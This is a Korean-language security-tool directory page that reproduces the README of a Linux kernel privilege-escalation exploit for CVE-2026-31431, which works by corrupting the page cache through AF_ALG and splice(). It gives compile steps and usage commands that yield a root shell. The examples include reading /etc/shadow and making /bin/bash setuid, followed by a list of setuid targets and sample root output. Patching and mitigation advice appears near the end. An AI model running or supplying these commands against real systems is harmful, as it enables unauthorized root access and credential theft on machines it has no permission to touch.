Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
copy-fail_LPE_Interactive — CVE-2026-31431에 대한 익스플로잇으로, Linux 커널 페이지 캐시 손상 취약점을 이용하여 AF_ALG 및 splice() 체인을 통해 대화형 루트 셸과 비대화형 명령 실행을 제공합니다. | Kitploit
도구/GitHubGitHub/h1d3r/copy-fail_lpe_interactive
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubh1d3r/copy-fail_lpe_interactive

copy-fail_LPE_Interactive

CVE-2026-31431에 대한 익스플로잇으로, Linux 커널 페이지 캐시 손상 취약점을 이용하여 AF_ALG 및 splice() 체인을 통해 대화형 루트 셸과 비대화형 명령 실행을 제공합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-31431 Copy Fail Exploit

Linux 커널 page cache 오염 취약점 도구로, 비대화형 명령 실행을 지원합니다.

취약점 개요

CVE-2026-31431은 Linux 커널의 authencesn AEAD 알고리즘 구현에 존재하는 논리적 결함 취약점입니다. AF_ALG 및 splice() 시스템 콜 체인을 통해 공격자는 임의의 읽기 가능한 파일의 page cache에 4바이트 데이터를 쓸 수 있습니다.

영향 범위:

  • Linux 커널 4.14+ (2017년 - 2026년 4월)
  • 거의 모든 주요 배포판: Ubuntu, Debian, CentOS, RHEL, Amazon Linux 등

취약점 특징:

  • 100% 신뢰성, 경쟁 조건 불필요
  • 커널 오프셋 계산 불필요
  • 동일한 바이너리가 모든 배포판에서 동작
  • 디스크 파일을 수정하지 않고 메모리 캐시만 오염

파일 설명

root@kitploit:~
.
├── copyfail_universal.c    # 메인 POC 소스코드 (정적 컴파일, libc 의존성 없음)
├── copyfail_universal      # 컴파일된 바이너리
├── run_cmd.sh              # 비대화형 실행 wrapper 스크립트
├── Makefile                # 컴파일 스크립트
└── README.md               # 본 문서

컴파일

root@kitploit:~
# 방법 1: gcc 및 ld 사용
gcc -c copyfail_universal.c -o copyfail_universal.o -O2 -fno-stack-protector -fno-pic -fno-pie
ld copyfail_universal.o -o copyfail_universal -static -nostdlib
chmod +x copyfail_universal

# 방법 2: Makefile 사용
make

사용 방법

대화형 Root Shell

root@kitploit:~
./copyfail_universal

비대화형 명령 실행

root@kitploit:~
# 방법 1: wrapper 스크립트 사용 (권장)
./run_cmd.sh "id"
./run_cmd.sh "cat /etc/shadow"
./run_cmd.sh "chmod 4777 /bin/bash"

# 방법 2: 파이프 사용
echo 'id > /tmp/pwned.txt; exit' | ./copyfail_universal

# 방법 3: 환경 변수 사용
CMD='whoami' ./copyfail_universal

다른 setuid 대상 지정

root@kitploit:~
# 기본 대상은 /usr/bin/su
# 소스코드의 path 변수를 수정하여 다른 대상을 지정할 수 있습니다.

# 일반적으로 사용 가능한 대상:
# /usr/bin/su
# /usr/bin/passwd
# /usr/bin/chsh
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/pkexec

자동 복구

취약점은 page cache만 수정하며 디스크 파일은 수정하지 않습니다. 다음 명령으로 복구할 수 있습니다:

root@kitploit:~
sync; echo 3 > /proc/sys/vm/drop_caches

run_cmd.sh 스크립트에는 자동 복구 기능이 내장되어 있습니다.

예시 출력

root@kitploit:~
$ ./run_cmd.sh "id"

[*] CVE-2026-31431 Copy Fail Exploit
[*] Target: /usr/bin/su
[*] Mode: Interactive shell
[*] Payload size: 112 bytes
[*] Corrupting page cache...
[+] Done! Executing su...

uid=0(root) gid=1000(user) groups=1000(user),4(adm),27(sudo)

영향을 받는 setuid 프로그램

시스템의 모든 setuid 프로그램 찾기:

root@kitploit:~
find / -perm -4000 -user root -type f 2>/dev/null

수정 권장 사항

  1. 커널 업데이트 - 패치 a664bf3d603d가 포함된 커널 버전으로 업그레이드

  2. 임시 완화 - algif_aead 모듈 비활성화:

    root@kitploit:~
    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
    rmmod algif_aead 2>/dev/null || true
    
  3. 컨테이너 환경 - seccomp를 사용하여 AF_ALG socket 생성을 차단

기술 세부 사항

  • 취약점 유형: Page cache 쓰기 범위 초과
  • 근본 원인: authencesn이 대상 버퍼를 임시 저장소로 사용하여 경계를 벗어난 4바이트를 기록
  • 공격 방식: splice()를 통해 page cache 페이지를 crypto 서브시스템에 전달
  • 쓰기 능력: 각 작업마다 임의의 읽기 가능한 파일의 page cache에 4바이트 기록 가능

면책 조항

본 도구는 보안 연구 및 승인된 테스트 전용입니다. 승인되지 않은 시스템을 공격하는 데 본 도구를 사용하는 것은 불법입니다. 사용자는 모든 법적 책임을 스스로 부담해야 합니다.

참고 자료

  • CVE-2026-31431 Write-up
  • Xint Blog - Copy Fail
  • GitHub - 공식 POC
도구 다운로드
프로그램경로사용 가능 여부
su/usr/bin/su✅ 기본
passwd/usr/bin/passwd✅
chsh/usr/bin/chsh✅
chfn/usr/bin/chfn✅
gpasswd/usr/bin/gpasswd✅
pkexec/usr/bin/pkexec✅
mount/bin/mount✅
umount/bin/umount✅